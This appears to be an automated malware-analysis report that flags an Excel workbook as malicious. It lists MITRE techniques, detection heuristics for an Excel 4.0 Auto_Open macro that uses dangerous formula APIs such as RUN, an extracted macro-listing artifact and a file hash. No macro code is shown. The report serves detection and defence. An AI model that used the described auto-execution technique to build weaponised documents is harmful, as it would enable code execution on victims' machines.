MALICIOUS
Risk Score: 140
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The file contains Excel 4.0 macros, specifically triggering the Auto_Open function. The critical heuristic 'OLE_XLM_DANGEROUS_FN' indicates the use of dangerous formula APIs like RUN, suggesting the macro is designed to execute arbitrary code. The presence of the Auto_Open entry and the use of dangerous functions strongly indicate a malicious intent to execute code upon opening the document.
Heuristics 3
- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs (critical, OLE_XLM_DANGEROUS_FN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream; XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 129271 bytes |

SHA-256: ffb8b2f5b75064acacd3a457a239509ba7028b4828f51a278361ec20edc155ce

Preview script: first 1,000 lines of the extracted script